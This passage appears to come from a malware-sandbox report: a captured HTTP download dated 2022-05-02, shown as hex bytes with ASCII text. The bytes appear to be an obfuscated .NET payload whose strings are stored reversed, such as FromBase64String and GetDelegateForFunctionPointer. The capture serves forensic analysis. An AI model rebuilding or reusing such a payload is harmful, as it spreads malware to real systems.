                                                                                  Data Ascii: Gx30Qe2FHV7tjWNTnnOvNlGbEmlTTldwjWstFtURQj2iRsQYdC2ejWwAqWfhEqvt2qtNod7Sg1o7l3NMUMi1vU0bBqdkjWJj9eWOXvDZO6jis8jfjW61yyFLBJZAYdCm22FAjW6NleZqwSHDKttXNzvRbW2al4llICI0hiWs7AsqjWF1VIgKVVSXDWt5DlC9jWhgsVhn2jhUMaGHCvTOEIknG07oUDff4NGefhyUBabNjnV
                                                                                  2022-05-02 11:02:01 UTC399INData Raw: 6a 47 52 64 5a 57 70 00 67 6e 69 64 6e 65 50 5f 74 65 73 00 67 6e 69 64 6e 65 50 5f 74 65 67 00 70 61 4d 6d 75 6e 45 74 65 47 00 79 65 4b 74 65 47 00 65 63 61 6c 50 6e 49 65 6c 69 70 6d 6f 43 00 47 55 57 61 75 54 64 4f 78 4e 00 73 74 6e 65 6d 75 67 72 41 63 69 72 65 6e 65 47 6c 6c 41 74 65 47 00 73 65 70 79 74 62 75 53 74 65 47 00 31 60 72 65 72 61 70 6d 6f 43 49 00 72 65 62 6d 65 6d 00 6b 6e 61 52 79 61 72 72 41 74 65 47 00 6e 6f 69 74 69 6e 69 66 65 44 65 70 79 54 63 69 72 65 6e 65 47 74 65 47 00 73 65 70 79 54 74 73 69 4c 65 76 6c 6f 73 65 52 00 72 65 62 6d 65 4d 74 65 47 00 6c 37 54 34 4d 31 64 67 34 58 00 65 70 79 54 74 6c 75 61 66 65 64 00 65 70 79 54 6d 65 74 69 00 65 75 6c 61 56 74 6c 75 61 66 65 64 00 73 65 6d 61 4e 72 65 62 6d 65 6d 00 41 62 31
                                                                                  Data Ascii: jGRdZWpgnidneP_tesgnidneP_tegpaMmunEteGyeKteGecalPnIelipmoCGUWauTdOxNstnemugrAcireneGllAteGsepytbuSteG1`rerapmoCIrebmemknaRyarrAteGnoitinifeDepyTcireneGteGsepyTtsiLevloseRrebmeMteGl7T4M1dg4XepyTtluafedepyTmetieulaVtluafedsemaNrebmemAb1
                                                                                  2022-05-02 11:02:01 UTC415INData Raw: 4c 59 4e 5a 44 35 52 54 00 6e 61 69 64 6e 45 67 69 42 32 33 64 65 78 69 46 00 32 33 64 65 78 69 46 00 38 32 31 65 73 61 42 00 6a 61 49 6f 48 6a 4d 64 67 62 66 43 51 57 4e 44 45 31 4a 59 00 65 66 4c 78 56 41 73 49 4b 53 36 6e 51 57 56 52 30 62 55 6d 00 65 64 6f 43 68 73 61 48 74 65 47 00 65 64 6f 43 68 73 61 48 74 65 47 2e 3e 74 63 65 6a 62 4f 2e 6d 65 74 73 79 53 3c 72 65 72 61 70 6d 6f 43 79 74 69 6c 61 75 71 45 49 2e 63 69 72 65 6e 65 47 2e 73 6e 6f 69 74 63 65 6c 6c 6f 43 2e 6d 65 74 73 79 53 00 73 6c 61 75 71 45 2e 3e 74 63 65 6a 62 4f 2e 6d 65 74 73 79 53 3c 72 65 72 61 70 6d 6f 43 79 74 69 6c 61 75 71 45 49 2e 63 69 72 65 6e 65 47 2e 73 6e 6f 69 74 63 65 6c 6c 6f 43 2e 6d 65 74 73 79 53 00 74 63 6c 49 34 79 48 4a 72 65 4a 48 51 57 4b 6a 42 77 69 67
                                                                                  Data Ascii: LYNZD5RTnaidnEgiB23dexiF23dexiF821esaBjaIoHjMdgbfCQWNDE1JYefLxVAsIKS6nQWVR0bUmedoChsaHteGedoChsaHteG.>tcejbO.metsyS<rerapmoCytilauqEI.cireneG.snoitcelloC.metsySslauqE.>tcejbO.metsyS<rerapmoCytilauqEI.cireneG.snoitcelloC.metsyStclI4yHJreJHQWKjBwig
                                                                                  2022-05-02 11:02:01 UTC431INData Raw: 00 73 65 74 79 42 74 65 47 00 31 60 72 6f 74 61 72 65 6d 75 6e 45 49 00 63 76 77 73 43 72 57 68 5a 53 00 79 32 4c 39 77 44 57 65 55 65 00 65 70 79 54 67 6e 69 72 61 6c 63 65 44 5f 74 65 67 00 6f 66 6e 49 72 65 62 6d 65 4d 00 65 6c 64 6e 61 48 64 6f 68 74 65 4d 65 6d 69 74 6e 75 52 00 65 6d 61 72 46 6b 63 61 74 53 00 65 63 61 72 54 6b 63 61 74 53 00 64 4f 38 30 4b 69 57 69 63 4a 00 69 34 4b 5a 38 4c 57 78 5a 4f 00 61 36 74 4d 4c 6c 59 55 30 69 34 75 42 66 58 55 46 54 58 00 65 74 61 67 65 6c 65 44 00 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 72 6f 46 65 74 61 67 65 6c 65 44 74 65 47 00 67 6e 69 72 74 53 74 65 47 00 67 6e 69 72 74 53 34 36 65 73 61 42 6d 6f 72 46 00 74 72 65 76 6e 6f 43 00 65 63 61 6c 70 65 52 00 38 46 54 55 5f 74 65 67 00 74 78 65 54 2e
                                                                                  Data Ascii: setyBteG1`rotaremunEIcvwsCrWhZSy2L9wDWeUeepyTgniralceD_tegofnIrebmeMeldnaHdohteMemitnuRemarFkcatSecarTkcatSdO80KiWicJi4KZ8LWxZOa6tMLlYU0i4uBfXUFTXetageleDretnioPnoitcnuFroFetageleDteGgnirtSteGgnirtS46esaBmorFtrevnoCecalpeR8FTU_tegtxeT.
                                                                                  2022-05-02 11:02:01 UTC447INData Raw: 4a 41 44 5a 4b 51 00 4c 66 48 47 48 31 72 6b 31 35 64 78 34 58 78 4b 6a 35 55 00 41 33 35 77 44 32 55 72 35 62 72 30 34 75 68 38 30 47 4e 00 6b 5a 54 33 32 57 6b 63 4c 43 6f 4d 34 62 43 57 33 6c 58 00 36 32 6d 36 4a 43 75 30 55 34 4a 4b 34 4f 66 32 41 6a 45 00 4a 71 62 33 77 77 4e 72 38 6b 78 73 34 4a 6b 58 6c 59 52 00 36 5a 62 6b 56 6e 68 74 63 38 79 47 34 36 49 55 6b 73 4a 00 45 76 78 67 58 34 6e 6c 57 76 41 4e 34 34 33 4b 52 35 57 00 75 68 30 48 68 6e 47 31 64 79 4b 6c 34 66 32 6d 48 73 66 00 61 72 5a 49 67 59 54 5a 64 57 38 51 34 46 6b 74 4d 43 56 00 75 54 56 45 35 4b 72 33 59 41 4b 61 34 4f 49 38 4b 42 64 00 51 58 6b 34 67 76 5a 38 4b 4f 70 64 34 49 41 75 45 62 67 00 62 51 37 46 41 39 66 45 39 37 4d 35 34 77 4a 36 36 63 59 00 64 45 6b 46 33 31 5a 72
                                                                                  Data Ascii: JADZKQLfHGH1rk15dx4XxKj5UA35wD2Ur5br04uh80GNkZT32WkcLCoM4bCW3lX62m6JCu0U4JK4Of2AjEJqb3wwNr8kxs4JkXlYR6ZbkVnhtc8yG46IUksJEvxgX4nlWvAN443KR5Wuh0HhnG1dyKl4f2mHsfarZIgYTZdW8Q4FktMCVuTVE5Kr3YAKa4OI8KBdQXk4gvZ8KOpd4IAuEbgbQ7FA9fE97M54wJ66cYdEkF31Zr
                                                                                  2022-05-02 11:02:01 UTC463INData Raw: 64 69 00 75 62 5a 36 74 6f 62 65 45 59 57 4c 67 55 70 59 6c 64 43 00 4b 59 5a 51 6d 74 55 33 31 56 56 33 67 5a 4e 49 69 71 53 00 4f 53 49 6d 4f 59 77 48 78 50 5a 42 4d 33 74 45 48 30 6b 00 4f 55 4a 52 44 6e 57 78 50 39 47 38 4d 35 74 4c 34 64 79 00 43 38 33 6f 59 58 66 69 50 49 58 59 4d 6c 48 4d 53 53 43 00 5a 70 4b 56 37 36 44 32 55 6f 4a 52 4d 78 39 74 65 42 4f 00 61 35 71 52 48 33 31 65 6c 33 5a 31 4d 41 6b 77 54 37 65 00 4f 75 63 6c 47 41 47 64 78 76 35 6d 4d 68 52 45 51 48 6f 00 78 77 43 49 48 52 77 6d 74 74 71 4a 4d 48 50 6d 33 56 76 00 74 48 70 38 33 6d 35 6c 6c 57 6f 43 4d 4c 64 4b 64 53 6a 00 31 36 6d 78 58 54 30 43 6b 36 70 48 4d 55 71 61 4f 33 4a 00 74 35 45 79 43 6b 4a 41 64 51 67 49 4d 33 59 67 4c 72 53 00 75 35 59 42 6e 70 64 56 67 52 46 58
                                                                                  Data Ascii: diubZ6tobeEYWLgUpYldCKYZQmtU31VV3gZNIiqSOSImOYwHxPZBM3tEH0kOUJRDnWxP9G8M5tL4dyC83oYXfiPIXYMlHMSSCZpKV76D2UoJRMx9teBOa5qRH31el3Z1MAkwT7eOuclGAGdxv5mMhREQHoxwCIHRwmttqJMHPm3VvtHp83m5llWoCMLdKdSj16mxXT0Ck6pHMUqaO3Jt5EyCkJAdQgIM3YgLrSu5YBnpdVgRFX
                                                                                  2022-05-02 11:02:01 UTC479INData Raw: 34 00 00 3a 3e 00 00 ef 34 00 00 3a 38 00 00 ef 2e 00 00 35 ee 00 00 ef 21 00 00 1d 3b 00 00 ef 18 00 00 3a 32 00 00 ef 10 00 00 16 ad 00 00 ef 02 00 00 3a 2c 00 00 0b 5e 00 00 1d 3b 00 00 ee f6 00 00 16 b1 00 00 e5 a5 00 00 37 65 00 00 e9 42 00 00 16 ad 00 00 cf 67 00 00 16 ad 00 00 e9 2e 00 00 16 ad 00 00 cf 5b 00 00 16 ad 00 00 e9 20 00 00 16 ad 00 00 e9 17 00 00 16 ad 00 00 e9 0c 00 00 1d 3b 00 00 e6 70 00 00 37 1f 00 00 08 2e 00 00 16 b1 00 00 e3 47 00 00 16 ad 00 00 e7 5c 00 00 37 1f 00 00 e7 50 00 00 37 1f 00 00 e7 46 00 00 37 1f 00 00 08 2e 00 00 36 b5 00 00 e6 82 00 00 16 b1 00 00 e6 74 00 00 1d 3b 00 00 e6 70 00 00 16 b1 00 00 e5 a5 00 00 16 b1 00 00 e3 47 00 00 1d 3b 00 00 e4 c8 00 00 16 ad 00 00 e4 01 00 00 36 b5 00 00 e3 f7 00 00 16 ad 00 00
                                                                                  Data Ascii: 4:>4:8.5!;:2:,^;7eBg.[ ;p7.G\7P7F7.6t;pG;6
                                                                                  2022-05-02 11:02:01 UTC495INData Raw: 1a 00 00 05 f1 00 d7 00 00 00 62 00 00 00 d1 2a b3 00 00 ca 55 00 00 05 e9 2a 8d 00 00 00 62 00 00 05 e9 2a 3b 00 00 c9 45 00 00 04 c1 2a 29 00 00 c8 ec 00 00 04 39 02 f8 00 00 94 db 00 00 00 8c 03 1c 00 00 a8 11 00 00 00 94 2a 03 00 00 c8 e2 00 00 00 94 29 ef 00 00 94 e4 00 00 00 8c 29 db 00 00 71 47 00 00 00 24 0f d5 00 00 c8 bb 00 00 00 21 29 c9 00 00 c8 db 00 00 02 81 29 a9 00 00 c8 d4 00 00 02 81 0e 4c 00 00 00 62 00 00 00 84 29 83 00 00 c8 ce 00 00 02 81 0e 4c 00 00 00 62 00 00 00 7c 29 70 00 00 c8 c1 00 00 02 81 29 6b 00 00 c8 bb 00 00 00 19 29 2b 00 00 c8 82 00 00 02 09 1e e0 00 00 b8 d4 00 00 00 74 0d a7 00 00 c8 21 00 00 02 a1 00 d7 00 00 00 62 00 00 00 74 0f fa 00 00 94 d2 00 00 00 74 00 d7 00 00 c5 87 00 00 02 51 00 e1 00 00 00 62 00 00 05 c9
                                                                                  Data Ascii: b*U*b*;E*)9*))qG$!))Lb)Lb|)p)k)+t!bttQb
                                                                                  2022-05-02 11:02:01 UTC511INData Raw: 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 08 00 00 00 00 71 05 00 07 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 08 00 00 00 00 71 05 00 07 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 ce bb 00 02 00 00 00 00 cd e7 00 01 00 00 00 00 ce bb 00 02 00 00 00 00 cd e7 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqqq
                                                                                  2022-05-02 11:02:01 UTC527INData Raw: 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 03 10 10 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 01 42 41 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqBAqqqqqqq
                                                                                  2022-05-02 11:02:01 UTC543INData Raw: 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 01 00 00 00 00
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
                                                                                  2022-05-02 11:02:01 UTC559INData Raw: 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a d0 c3 1e 00 01 7e c2 00 16 00 00 00 07 8d b8 1a cf c3 14 00 00 75 59 00 46 00 03 00 00 00 00 1a cf 02 d4 00 00 70 51 18 10 00 00 00 07 8d a4 1a cf 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a cf c3 07 00 01 7e c2 00 16 00 00 00 07 8d 90 1a cf 39 8f 00 00 75 59 00 46 00 03 00 00 00 00 1a cf 02 d4 00 00 70 51 18 10 00 00 00 07 8d 7c 1a cf 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a cf c2 fa 00 01 7e c2 00 16 00 00 00 07 8d 68 1a cf 39 8f 00 00 75 59 00 46 00 03 00 00 00 00 1a cf 02 d4 00 00 70 51 18 10 00 00 00 07 8d 54 1a cf 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a cf c2 eb 00 01 7e c2 00 16 00 00 00 07 8d 40 1a cf c2 e4 00 00 75 59 00 46 00 03 00 00 00 00 1a cf 02 d4 00 00 70 51 18 10 00 00 00 07 8d 2c 1a cf
                                                                                  Data Ascii: Lb~uYFpQLb~9uYFpQ|Lb~h9uYFpQTLb~@uYFpQ,
                                                                                  2022-05-02 11:02:01 UTC575INData Raw: 4c 00 00 00 62 18 06 00 03 00 00 00 00 18 25 ae 67 00 01 7e c2 00 16 00 00 00 07 63 84 18 25 36 6f 00 00 75 59 00 46 00 03 00 00 00 00 18 25 02 d4 00 00 70 51 18 10 00 00 00 07 63 70 18 25 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 18 20 ae 4f 00 01 7e c2 00 16 00 00 00 07 63 54 18 1b ae 3f 00 00 75 59 00 46 00 03 00 00 00 00 18 1b 02 d4 00 00 70 51 18 10 00 00 00 07 63 40 18 1b 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 18 1a ae 2f 00 01 7e c2 00 16 00 00 00 07 63 2c 18 19 ac 67 00 00 75 59 00 46 00 03 00 00 00 00 18 19 02 d4 00 00 70 51 18 10 00 00 00 07 63 18 18 19 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 18 18 ae 1f 00 01 7e c2 00 16 00 00 00 07 63 04 18 17 ac 67 00 00 75 59 00 46 00 03 00 00 00 00 18 17 02 d4 00 00 70 51 18 10 00 00 00 07 62 f0 18 17
                                                                                  Data Ascii: Lb%g~c%6ouYF%pQcp%Lb O~cT?uYFpQc@Lb/~c,guYFpQcLb~cguYFpQb
                                                                                  2022-05-02 11:02:01 UTC591INData Raw: 4c 00 00 00 62 18 06 00 03 00 00 00 00 15 42 98 79 00 01 7e c2 00 16 00 00 00 07 39 b8 15 41 98 70 00 00 75 59 00 46 00 03 00 00 00 00 15 41 02 d4 00 00 70 51 18 10 00 00 00 07 39 a4 15 41 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 15 3e 98 5a 00 01 7e c2 00 16 00 00 00 07 39 8c 15 3b 90 e4 00 00 75 59 00 46 00 03 00 00 00 00 15 3b 02 d4 00 00 70 51 18 10 00 00 00 07 39 78 15 3b 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 15 3a 98 4a 00 01 7e c2 00 16 00 00 00 07 39 64 15 39 6e c3 00 00 75 59 00 46 00 03 00 00 00 00 15 39 02 d4 00 00 70 51 18 10 00 00 00 07 39 50 15 39 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 15 39 98 3a 00 01 7e c2 00 16 00 00 00 07 39 3c 15 39 98 32 00 00 75 59 00 46 00 03 00 00 00 00 15 39 02 d4 00 00 70 51 18 10 00 00 00 07 39 28 15 39
                                                                                  Data Ascii: LbBy~9ApuYFApQ9ALb>Z~9;uYF;pQ9x;Lb:J~9d9nuYF9pQ9P9Lb9:~9<92uYF9pQ9(9
                                                                                  2022-05-02 11:02:01 UTC607INData Raw: 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 78 82 af 00 01 7e c2 00 16 00 00 00 07 10 54 12 77 82 05 00 00 75 59 00 46 00 03 00 00 00 00 12 77 02 d4 00 00 70 51 18 10 00 00 00 07 10 40 12 77 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 75 82 9f 00 01 7e c2 00 16 00 00 00 07 10 28 12 73 82 97 00 00 75 59 00 46 00 03 00 00 00 00 12 73 02 d4 00 00 70 51 18 10 00 00 00 07 10 14 12 73 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 73 82 88 00 01 7e c2 00 16 00 00 00 07 10 00 12 73 81 e1 00 00 75 59 00 46 00 03 00 00 00 00 12 73 02 d4 00 00 70 51 18 10 00 00 00 07 0f ec 12 73 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 6f 82 74 00 01 7e c2 00 16 00 00 00 07 0f d4 12 6b 82 68 00 00 75 59 00 46 00 03 00 00 00 00 12 6b 02 d4 00 00 70 51 18 10 00 00 00 07 0f c0 12 6b
                                                                                  Data Ascii: Lbx~TwuYFwpQ@wLbu~(suYFspQsLbs~suYFspQsLbot~khuYFkpQk
                                                                                  2022-05-02 11:02:01 UTC623INData Raw: 4c 00 00 00 62 18 06 00 03 00 00 00 00 10 19 70 48 00 01 7e c2 00 16 00 00 00 06 e8 20 10 19 70 42 00 00 75 59 00 46 00 03 00 00 00 00 10 19 02 d4 00 00 70 51 18 10 00 00 00 06 e8 0c 10 19 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 10 18 70 33 00 01 7e c2 00 16 00 00 00 06 e7 f8 10 17 70 2c 00 00 75 59 00 46 00 03 00 00 00 00 10 17 02 d4 00 00 70 51 18 10 00 00 00 06 e7 e4 10 17 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 10 16 70 1f 00 01 7e c2 00 16 00 00 00 06 e7 d0 10 15 12 5d 00 00 75 59 00 46 00 03 00 00 00 00 10 15 02 d4 00 00 70 51 18 10 00 00 00 06 e7 bc 10 15 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 10 15 70 0d 00 01 7e c2 00 16 00 00 00 06 e7 a8 10 15 6f c5 00 00 75 59 00 46 00 03 00 00 00 00 10 15 02 d4 00 00 70 51 18 10 00 00 00 06 e7 94 10 15
                                                                                  Data Ascii: LbpH~ pBuYFpQLbp3~p,uYFpQLbp~]uYFpQLbp~ouYFpQ
                                                                                  2022-05-02 11:02:01 UTC639INData Raw: d7 00 01 4a 60 00 81 00 00 00 05 2f e8 0d c7 02 d4 00 00 70 51 18 91 00 00 00 05 2e 50 0d c7 02 d4 00 00 70 51 18 91 00 00 00 05 2e 3c 0d c6 1b 73 00 00 ae 04 01 c6 00 03 00 00 00 00 0d c3 63 bc 00 00 ad dd 01 c6 00 03 00 00 00 00 0d c2 30 ca 00 00 75 59 01 c6 00 03 00 00 00 00 0d c0 0e 4c 00 00 00 62 18 86 00 03 00 00 00 00 0d c0 63 b6 00 01 48 4d 00 93 00 00 00 05 2e 2c 0d c0 02 d8 00 01 48 38 00 93 00 00 00 05 2e 18 0d c0 02 d4 00 00 70 51 18 91 00 00 00 05 2d bc 0d c0 00 d7 00 00 00 62 18 86 00 00 00 05 2d 98 0d bf 11 06 00 01 47 f7 00 93 00 00 00 05 2c b8 0d bf 02 d4 00 00 70 51 18 91 00 00 00 05 2c a4 0d bf 63 75 00 01 47 bc 00 93 00 00 00 04 fe 2c 0d bf 02 d8 00 01 47 a7 00 93 00 00 00 04 fe 18 0d bf 02 d4 00 00 70 51 18 91 00 00 00 04 fe 04 0d be
                                                                                  Data Ascii: J`/pQ.PpQ.<sc0uYLbcHM.,H8.pQ-b-G,pQ,cuG,GpQ
                                                                                  2022-05-02 11:02:01 UTC655INData Raw: ec 00 01 0b f1 00 93 00 00 00 02 c8 e8 09 3b 04 30 00 01 0b dc 00 93 00 00 00 02 c8 d4 09 3b 44 da 00 01 0b c7 00 93 00 00 00 02 c8 c4 09 3b 02 d8 00 01 0b b2 00 93 00 00 00 02 c8 b0 09 3b 02 d4 00 00 70 51 18 91 00 00 00 02 c8 44 09 39 3f b5 00 00 9a 8e 00 c6 00 00 00 02 c5 0c 09 38 39 8f 00 01 0b 83 00 81 00 00 00 02 c4 e0 09 36 3f 9d 00 00 9c 07 00 c6 00 00 00 02 c2 84 09 34 3f 6a 00 00 fe e3 00 c4 00 00 00 02 bc 98 09 2f 44 5a 00 01 0b 71 00 93 00 00 00 02 b7 f4 09 2c 44 49 00 01 0b 71 00 84 00 00 00 02 b7 c0 09 27 44 26 00 01 0b 54 00 91 00 00 00 02 b3 f0 09 21 43 f9 00 01 0b 47 00 93 00 00 00 02 ae f0 09 1f 3f 6a 00 00 ff 46 00 c4 00 00 00 02 ab 00 09 1f 02 f8 00 01 0b 30 08 84 00 00 00 02 aa e8 09 1f 02 f8 00 00 fe b4 08 c6 00 00 00 02 aa d4 09 1f
                                                                                  Data Ascii: ;0;D;;pQD9?896?4?j/DZq,DIq'D&T!CG?jF0
                                                                                  2022-05-02 11:02:01 UTC671INData Raw: 2e 00 00 02 d1 20 93 00 80 00 00 00 00 04 fb 00 d7 00 00 00 62 18 86 00 00 00 01 35 58 04 fb 02 d4 00 00 70 51 18 91 00 00 00 01 35 44 04 fa 1b 73 00 00 ae 04 01 c6 00 03 00 00 00 00 04 f8 23 66 00 00 ad dd 01 c6 00 03 00 00 00 00 04 f8 00 d7 00 00 75 59 01 c6 00 03 00 00 00 00 04 f6 0e 4c 00 00 00 62 18 86 00 03 00 00 00 00 04 f6 28 23 00 00 c5 e7 00 93 00 00 00 01 35 34 04 f6 02 d8 00 00 c5 d2 00 93 00 00 00 01 35 20 04 f6 02 d4 00 00 70 51 18 91 00 00 00 01 35 0c 04 f5 1e f2 00 00 02 d1 00 93 00 00 00 01 33 90 04 f5 00 d7 00 00 00 62 18 86 00 00 00 01 33 6c 04 f5 02 d4 00 00 70 51 18 91 00 00 00 01 33 58 04 f5 28 09 00 00 c5 a8 00 93 00 00 00 01 33 48 04 f5 02 d8 00 00 c5 93 00 93 00 00 00 01 33 34 04 f5 02 d4 00 00 70 51 18 91 00 00 00 01 33 20 04 f5
                                                                                  Data Ascii: . b5XpQ5Ds#fuYLb(#545 pQ53b3lpQ3X(3H34pQ3
                                                                                  2022-05-02 11:02:01 UTC687INData Raw: 21 00 00 72 36 01 e1 00 00 00 00 26 b4 00 03 00 d7 00 00 72 3f 01 e1 00 00 00 00 26 a4 00 03 02 f0 00 00 72 36 01 e1 00 00 00 00 26 94 00 03 02 f8 00 00 71 3e 01 e1 00 00 00 00 25 a8 00 03 00 d7 00 00 72 36 01 e1 00 00 00 00 25 9c 00 02 00 b3 00 00 00 62 18 86 00 00 00 00 25 4c 00 02 03 43 00 00 71 e6 00 93 00 00 00 00 25 3c 00 02 02 d8 00 00 71 d2 00 93 00 00 00 00 25 28 00 02 03 3f 00 00 71 be 00 93 00 00 00 00 25 18 00 02 02 d4 00 00 70 51 18 91 00 00 00 00 25 04 00 02 03 39 00 00 71 b3 01 e1 00 00 00 00 24 f0 00 02 03 25 00 00 71 96 01 e1 00 00 00 00 24 98 00 02 03 21 00 00 71 8b 01 e1 00 00 00 00 24 84 00 02 00 d7 00 00 71 6a 01 e1 00 00 00 00 24 74 00 02 02 f0 00 00 71 5f 01 e1 00 00 00 00 24 64 00 02 00 d7 00 00 71 55 00 81 00 00 00 00 24 24 00 02
                                                                                  Data Ascii: !r6&r?&r6&q>%r6%b%LCq%<q%(?q%pQ%9q$%q$!q$qj$tq_$dqU$$
                                                                                  2022-05-02 11:02:01 UTC703INData Raw: 00 02 d3 00 26 2f a8 00 00 ce d4 00 26 2e 84 00 00 a5 3d 00 26 2e 4b 00 00 92 f7 00 26 31 4c 00 00 a5 7a 00 26 31 49 00 00 d4 3a 00 26 0e 3f 00 00 00 7a 00 26 05 05 00 00 76 c0 00 26 02 e1 00 00 00 74 00 26 10 42 00 00 9c 49 00 26 10 58 00 00 97 b4 00 26 02 e1 00 00 d4 d4 00 21 0c 96 00 00 d4 41 00 13 2e 84 00 00 a5 3d 00 26 2e 4b 00 00 92 f7 00 26 31 4c 00 00 a5 7a 00 26 31 49 00 00 d4 3a 00 26 0e 3f 00 00 00 7a 00 26 05 05 00 00 76 c0 00 26 02 e1 00 00 00 74 00 26 10 42 00 00 9c 49 00 26 10 58 00 00 97 b4 00 26 02 e1 00 00 d4 2f 00 21 0c 96 00 00 d3 08 00 13 02 e1 00 00 d2 fd 00 21 0c 96 00 00 02 d3 00 26 31 01 00 00 d2 f3 80 56 31 01 00 00 10 14 80 56 31 01 00 00 d2 e9 80 56 31 01 00 00 d2 da 80 56 31 01 00 00 d2 d3 80 56 31 01 00 00 d2 cb 80 56 02 e1
                                                                                  Data Ascii: &/&.=&.K&1Lz&1I:&?z&v&t&BI&X&!A.=&.K&1Lz&1I:&?z&v&t&BI&X&/!!&1V1V1V1V1V1V
                                                                                  2022-05-02 11:02:01 UTC719INData Raw: 00 00 00 00 00 53 91 00 00 01 00 1b 92 0b 29 00 65 00 00 00 00 00 00 53 7d 00 00 01 00 1b 8e 0b 28 00 65 00 00 00 00 00 00 53 69 00 00 01 00 1b 8a 0b 27 00 65 00 00 00 00 00 00 53 55 00 00 01 00 1b 86 0b 26 00 65 00 00 00 00 00 00 53 41 00 00 01 00 1b 82 0b 25 00 65 00 00 00 00 00 00 53 2d 00 00 01 00 1b 7e 0b 24 00 65 00 00 00 00 00 00 53 19 00 00 01 00 1b 7a 0b 23 00 65 00 00 00 00 00 00 53 05 00 00 01 00 1b 76 0b 22 00 65 00 00 00 00 00 00 52 f1 00 00 01 00 1b 72 0b 21 00 65 00 00 00 00 00 00 52 dd 00 00 01 00 1b 6e 0b 20 00 65 00 00 00 00 00 00 52 c9 00 00 01 00 1b 6a 0b 1f 00 65 00 00 00 00 00 00 52 b5 00 00 01 00 1b 66 0b 1e 00 65 00 00 00 00 00 00 52 a1 00 00 01 00 1b 62 0b 1d 00 65 00 00 00 00 00 00 52 8d 00 00 01 00 1b 5e 0b 1c 00 65 00 00 00 00
                                                                                  Data Ascii: S)eS}(eSi'eSU&eSA%eS-~$eSz#eSv"eRr!eRn eRjeRfeRbeR^e
